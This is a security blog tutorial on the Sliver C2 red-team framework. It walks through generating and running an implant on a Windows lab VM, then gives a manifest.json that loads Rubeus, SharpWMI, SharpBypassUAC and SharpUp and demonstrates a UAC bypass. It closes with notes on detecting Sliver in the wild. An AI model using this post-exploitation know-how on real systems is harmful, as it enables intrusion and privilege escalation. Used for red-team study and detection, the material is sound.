Sliver C2 - All hackers gain deathtouch in 2021
What is Sliver?
Lets get down to business and discuss a C2 Project I have grown fond over over the summer of 2021 which is Sliver, the work of the brilliant minds over at Bishop Fox. What is Sliver? Well lets consult the GitHub readme:
"Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. Sliver's implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS. Implants are dynamically compiled with unique X.509 certificates signed by a per-instance certificate authority generated when you first run the binary." [1]
Sliver is written in Golang, a popular language for both infosec tool development and malware authors as they branch away from the more classic languages. Out of the box, its built with some awesome features such as built in secure c2 channels via HTTPS, Wireguard, and mTLS, multiplayer mode for multiple operators, staged/stageless payloads, cross-compile for all major OS, built in evasion and canary support plus so much more. I urge you to give the Wiki a read to get a much clearer understanding of how each of these work and some of the under the hood details. Let us not forget this is open-sourced which allows you to tweak and improve upon this to your needs. You can also stick with the stable release builds that are available. [2]
Basic Usage
Moving on to some actual command line, lets fire up Sliver and get acquainted. Currently there is no stable GUI build for Sliver, but it is in the works for people who like them. I personally have no preference either way and have grown to enjoy Sliver's current CLI interface. Download the latest release here and unzip the file or compile it from source if you'd like.
You can run the server as a normal user, but to avoid permission errors I'll be using root here.
After the initial unpacking of assets, you should see a banner and a CLI prompt. Run a "help" command to get a list of what can be done on the main screen.
You'll see commands, generic (commands), and multiplayer specific. I won't be going over Wireguard or the multiplayer mode here, but may dive deeper into these when I get better acquainted with them. The bare bones basic usage to get started are the generate, sessions, use, and listener specific commands of mtls, http and https. You can use the "help" command before any of these to get a more detailed information prompt on how to use each command. How about we generate an implant? I'll be using a Windows 10 VM as the target computer for this lab.
We can build a implant binary for any major OS target, with the default being windows. The command structure for this is:
generate <connectionType> <SeverIp>:<OptionalPort> -o <OS> -a <Arch> -s </path/to/save>
-rwx------ 1 root root 8456704 Nov 4 23:39 /tmp/test.exe
As with any Go binary, they are quite large compared to some other compiled languages, mainly due to all the needed/default libraries are compiled with the binary and after Go 1.2, the line table is pre-expanded to decrease initialization time which adds to it size. Trying quick wins like strings or Floss is also more difficult due to the volume of strings in the implant which are obfuscated by default except canaries. Now that we have an implant, I'm going to move it to the Apache web-server running on my host so I can download it to the Windows target. We also need to start the mtls listener since that is the implant type we generated. I will be using the -l flag since I specified a custom port.
Let's pull down test.exe and run it!
Looks like we have a session! I disabled any AV on the system for simplicity. Under normal circumstances, a default implant will trigger alerts and most likely get axed by any competent AV solution.
Using the "use 1" command, I can now interact with the Sliver implant. Using another "help" will show a new list of commands specific to interacting with a session and some specific to the target OS such as "Sliver - Windows". From here you can run normal commands like ls (list files), ps (list processes), upload a file, download a file, cat a file to stdout plus much more. This is where you will begin host and internal network enumeration on a target along with some sweet persistence. If you've used other frameworks such as Metasploit, then this will feel pretty familiar in terms of command structure.
Slightly more advanced usage
That's the basic usage, but what more can we dive into? Lets talk about extensions or macros as the wiki describes them and reactions which are automatic commands that can be tied to various implant events. Sliver has the ability to load and run almost any .Net executable through an implant by using a custom json file that maps it to a Sliver command that can be called in any session that matches the required architecture. This means tools like Seatbelt or SharpUp can built into Sliver and loaded as needed, giving you the ability to run it through the implant to avoid dropping more files to disk on the target. Here is an example of a manifest.json config:
{
"extensionName": "WindowEnum",
"extensionCommands": [
{
"name": "rubeus",
"entrypoint": "Main",
"help": "Rubeus is a C# toolset for raw Kerberos interaction and abuses.",
"longHelp": "[[.Bold]]Command[[.Normal]]: rubeus [command] [options]\n[[.Bold]]About:[[.Normal]] Rubeus is a C# toolset for raw Kerberos interaction and abuses.\n\nRun [[.Bold]]rubeus /help[[.Normal]] to list all examples.",
"allowArgs": true,
"extFiles": [
{
"os": "windows",
"files": {
"x64": "Rubeus.exe",
"x86": "Rubeus.exe"
}
}
],
"isReflective": false,
"isAssembly": true
},
{
"name": "seatbelt",
"entrypoint": "Main",
"help": "Seatbelt is a C# project that performs a number of security oriented host-survey \"safety checks\" relevant from both offensive and defensive security perspectives.",
"longHelp": "[[.Bold]]Command[[.Normal]]: seatbelt [command] [options]\n[[.Bold]]About:[[.Normal]] Seatbelt is a C# project that performs a number of security oriented host-survey \"safety checks\" relevant from both offensive and defensive security perspectives.\n\nRun [[.Bold]]seatbelt /help[[.Normal]] to list all examples.",
"allowArgs": true,
"extFiles": [
{
"os": "windows",
"files": {
"x64": "Seatbelt.exe",
"x86": "Seatbelt.exe"
}
}
],
"isReflective": false,
"isAssembly": true
},
{
"name": "sharpwmi",
"entrypoint": "Main",
"help": "SharpWMI is a C# implementation of various WMI functionality.",
"longHelp": "[[.Bold]]Command[[.Normal]]: sharpwmi action=[action] query=[query] computername=[computername] [options]\n[[.Bold]]About:[[.Normal]] SharpWMI is a C# implementation of various WMI functionality. This includes local/remote WMI queries, remote WMI process creation through win32_process, and remote execution of arbitrary VBS through WMI event subscriptions. Alternate credentials are also supported for remote methods.",
"allowArgs": true,
"extFiles": [
{
"os": "windows",
"files": {
"x64": "SharpWMI.exe",
"x86": "SharpWMI.exe"
}
}
],
"isReflective": false,
"isAssembly": true
},
{
"name": "sharpuacbypass",
"entrypoint": "Main",
"help": "SharpBypassUAC currently supports the eventvwr, fodhelper, computerdefaults, sdclt, slui, and DiskCleanup UAC bypasses.",
"longHelp": "[[.Bold]]Command[[.Normal]]: SharpBypassUAC.exe -b=[value1] -e=[value2]\n[[.Bold]]About:[[.Normal]] SharpBypassUAC accepts a base64 encoded windows command to be executed in high integrity. -b, --bypass=VALUE Bypass to execute: eventvwr, fodhelper, computerdefaults, sdclt, slui -e, --encodedCommand=VALUE Base64 encoded command to execute.",
"allowArgs": true,
"extFiles": [
{
"os": "windows",
"files": {
"x64": "SharpBypassUAC.exe",
"x86": "SharpBypassUAC.exe"
}
}
],
"isReflective": false,
"isAssembly": true
},
{
"name": "sharpup",
"entrypoint": "Main",
"help": "SharpUp is a C# port of various PowerUp functionality",
"longHelp": "[[.Bold]]Command[[.Normal]]: SharpUp.exe [action]\n[[.Bold]]About:[[.Normal]] SharpUp is a C# port of various PowerUp functionality.\nExamples:\nSharpUp.exe audit\n",
"allowArgs": true,
"extFiles": [
{
"os": "windows",
"files": {
"x64": "SharpUp.exe",
"x86": "SharpUp.exe"
}
}
],
"isReflective": false,
"isAssembly": true
}
]
}
You can load it by using the load-extension command with the path to the folder containing the correct manifest.json
Now if you go back into a session, you'll see you have some extra options
What does sharpup say?
Nice we can bypass UAC and get Administrator privileges on the system. That is only a small demo of the power that 3rd party tools allow when being used by Sliver. For v1.5, client side extensions will be officially renamed macros since there will be the ability to add extensions to the implants themselves which will take that naming scheme. Expect some changes in the naming convention for these commands on that release.
Reactions are also something I've taken advantage of recently. Lets look at the help for that:
Reactions are automatic commands that can be tied to certain events and saved to disk, so that they are loaded each time the server is started. You can set a certain command to run when a session connects or disconnects, when loot is added or if a DNS canary is hit as examples. I recently took advantage of these during a CTF where a malware challenge I built used a Sliver implant that automatically opened the web browser if possible and opened an article and then YouTube to not a rickroll... but a rockroll! It also wrote to the home folder a file indicating people should not run random stuff. You can read more about it here
Catching it's use in the wild
While we have not caught much use of Sliver by malicious actors in our clients, it has been out and about. Recently Proofpoint released a short article on some Sliver being used in the wild by TA551 (Gold Cabin), found here. Another useful article that goes into detail hunting Sliver using Jarm and Shodan is https://blog.tofile.dev/2021/09/04/sliver.html which I suggest giving a read. I wrote a Suricata signature with the help of our teams IDS rule guru to catch the HTTP traffic of Sliver implants, which is available to our clients as part of the research teams ruleset. Its caught plenty of my HTTP tests and a few customers playing around! 😊
As development into the platform continues, especially after the release of a GUI, I think we will see an uptick in the use of this by both researchers, red teams, and malicious actors. I plan to stay on top of the latest updates and continue to dive into more advanced usage of the platform. Stick around for future parts to the Sliver saga.
Till next time, farewell and happy hacking!